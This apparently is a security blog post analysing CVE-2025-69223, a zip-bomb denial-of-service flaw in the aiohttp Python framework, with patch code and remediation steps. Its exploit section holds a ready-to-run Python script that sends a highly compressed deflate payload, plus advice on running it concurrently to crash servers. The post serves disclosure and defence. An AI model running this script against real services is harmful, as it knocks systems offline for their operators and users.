CVE-2025-69223

Puff, The Magic Dragon: Exploding RAM with aiohttp Zip Bombs

Amit Schendel
Amit Schendel
Senior Security Researcher

Jan 6, 2026·6 min read

Executive Summary (TL;DR)

aiohttp versions <= 3.13.2 failed to cap the output size of decompressed request bodies. By sending a small, highly compressed payload (gzip, deflate, brotli), an attacker can force the server to allocate gigabytes of memory, triggering an OOM crash and Denial of Service.

A classic 'Zip Bomb' vulnerability in the popular Python aiohttp framework allowing unauthenticated attackers to exhaust server memory via highly compressed payloads.

The Hook: Infinite Scalability (Until It Isn't)

Asynchronous Python frameworks like aiohttp are built on a promise: they handle thousands of concurrent connections efficiently by not blocking the event loop. They are the workhorses of the modern Python web ecosystem, powering everything from microservices to massive APIs. But there's a delicate balance in async land—resources are shared. If one request decides to eat the entire buffet, everyone else starves.

Enter CVE-2025-69223. This isn't some complex race condition or a subtle cryptographic failure. It is a blast from the past, a vulnerability so old school it belongs in a museum alongside the Morris Worm: the Zip Bomb (or Decompression Bomb).

The flaw lies in how aiohttp handled incoming requests with Content-Encoding headers. In its eagerness to be helpful, the framework would automatically decompress payloads—gzip, deflate, brotli, you name it—before handing the data to your application code. The problem? It trusted the client implicitly. It didn't ask, "Hey, how big is this thing going to get?" It just started pumping air into the balloon until the balloon (your RAM) popped.

The Flaw: Allocation Without Representation

The root cause, technically speaking, is CWE-409: Improper Handling of Highly Compressed Data. When a web server receives a request with a header like Content-Encoding: gzip, it assumes the client is sending compressed data to save bandwidth. The server's job is to inflate that data back to its original form so the application logic can read it.

In aiohttp versions 3.13.2 and older, the HTTPParser delegated this task to various decompressor objects (like DeflateBuffer for gzip/deflate). These buffers were implemented as effectively infinite sinks. The logic was roughly:

  1. Receive chunk of compressed bytes.

  2. Pass chunk to decompress().

  3. Append result to the buffer.

  4. Repeat until done.

Crucially, there was no check on the size of the output buffer. Compression algorithms like Deflate (used in gzip) have extremely high compression ratios for repetitive data. A string of 64MB of zeros can be compressed down to a few kilobytes. If an attacker sends a 50KB payload that expands to 5GB, aiohttp would dutifully attempt to allocate that 5GB in RAM. In a synchronous server, this crashes one thread. In an async server like aiohttp, blocking the main thread or exhausting memory crashes the entire application instance.

The Code: The Smoking Gun

Let's look at the patch to understand the failure. The fix was implemented in commit 2b920c39002cee0ec5b402581779bbaaf7c9138a. The developers introduced a DEFAULT_MAX_DECOMPRESS_SIZE of 32MiB and enforced it rigorously.

Here is the vulnerable logic conceptualized versus the hardened version:

Before (The Infinite Loop)

In the old code, the DeflateBuffer would just keep writing to memory:

# pseudo-code of vulnerable logic
chunk = self.decompressor.decompress(data)
self.out_buffer.extend(chunk)
# No questions asked. If chunk is 10GB, we die.

After (The Guard Rails)

The patch introduces a strict max_length check during the decompression phase. Note the specific handling of the max_length parameter passed to the underlying C-libraries (via Python's zlib/brotli bindings) and the manual check afterwards.

# In aiohttp/http_parser.py
 
DEFAULT_MAX_DECOMPRESS_SIZE = 32 * 1024 * 1024  # 32 MiB
 
# ... inside the decompress logic ...
try:
    # They decompress with limit + 1 to detect overflow explicitly
    chunk = self.decompressor.decompress_sync(
        chunk, max_length=self._max_decompress_size + 1
    )
except Exception:
    raise ContentEncodingError(...)
 
# The Checkmate
if len(chunk) > self._max_decompress_size:
    raise DecompressSizeError(
        "Decompressed data exceeds the configured limit of %d bytes"
        % self._max_decompress_size
    )

[!NOTE] The fix also required bumping minimum versions for brotli and brotlicffi to ensure the underlying libraries actually respected the max_length parameter. This highlights that security fixes often cascade into dependency hell.

The Exploit: 42 Kilobytes of Doom

Exploiting this is trivially easy. You don't need shellcode, you don't need ROP gadgets. You just need Python's zlib library and a malicious spirit.

The goal is to create a payload that is small on the wire (to bypass WAF input size limits usually checking Content-Length) but massive in memory.

The Attack Script

import aiohttp
import zlib
import asyncio
 
async def nuke_server(target_url):
    # 1. Create the Bomb
    # 100MB of 'A's compresses to very little
    payload_size = 100 * 1024 * 1024  
    huge_data = b'A' * payload_size
    
    # Compress it. This will result in a small byte string (~100KB or less)
    compressed_data = zlib.compress(huge_data)
    
    print(f"Payload size on wire: {len(compressed_data)} bytes")
    print(f"Expanded size in RAM: {payload_size} bytes")
 
    # 2. Send the Payload
    # We lie and say it's just 'deflate' encoding.
    headers = {
        'Content-Encoding': 'deflate',
        'Content-Type': 'text/plain'
    }
 
    async with aiohttp.ClientSession() as session:
        try:
            # The server will try to inflate this back to 100MB
            await session.post(target_url, data=compressed_data, headers=headers)
        except Exception as e:
            print(f"Attack sent (expect disconnect): {e}")
 
if __name__ == "__main__":
    asyncio.run(nuke_server("http://localhost:8080/"))

If the target is running multiple workers, you simply run this loop concurrently. Sending 10 requests of a 1GB bomb = 10GB RAM usage instantly. The Linux OOM killer will wake up, choose violence, and terminate the python process. Service down.

The Impact: Why Async Makes It Worse

The impact here is a high-severity Denial of Service (DoS). While it doesn't offer Remote Code Execution (RCE), for many businesses, a downed API is just as expensive as a breached one.

What makes this particularly spicy in the context of aiohttp is the architecture. In a traditional threaded server (like Apache + mod_wsgi), one heavy request kills one thread. The other threads keep serving users. In an async reactor pattern (Python's asyncio), heavy CPU operations or massive memory allocations on the main loop cause "blocking".

Even before the OOM killer steps in, the mere act of allocating and writing gigabytes of data to RAM will freeze the event loop. Heartbeats will fail, other connections will time out, and the application becomes unresponsive. It is a very cheap attack (low bandwidth for attacker) with very high impact (resource exhaustion for defender).

The Fix: Remediation

The remediation is straightforward, but it requires action. This is not a configuration change you can make in the vulnerable versions; code changes were required in the core library.

1. Patch Immediately

Update to aiohttp version 3.13.3 or higher.

pip install aiohttp>=3.13.3

2. Configuration Tuning

If your application legitimately needs to receive compressed payloads larger than 32MiB (the new default), you can adjust the limit. However, do so with extreme caution. Understand your physical memory constraints.

3. Defense in Depth

If your application does not expect compressed request bodies, you should block Content-Encoding headers at your reverse proxy (Nginx/HAProxy) or WAF level before the request even reaches the Python application. If you don't need it, turn it off.

Fix Analysis (1)

Technical Appendix

CVSS Score
7.5/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Affected Systems

aiohttp <= 3.13.2

Affected Versions Detail

Product
Affected Versions
Fixed Version
aiohttp
aio-libs
<= 3.13.23.13.3
AttributeDetail
CWECWE-409 (Improper Handling of Highly Compressed Data)
CVSS7.5 (High)
Attack VectorNetwork
Exploit StatusPoC Available
ImpactDenial of Service (DoS)
Patchv3.13.3
CWE-409
Improper Handling of Highly Compressed Data

The software does not handle compressed data correctly, allowing an attacker to cause a denial of service by sending a small amount of data that decompresses to a very large amount.

Vulnerability Timeline

Fix committed to master branch
2026-01-03
CVE-2025-69223 Published
2026-01-05
aiohttp v3.13.3 Released
2026-01-05

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.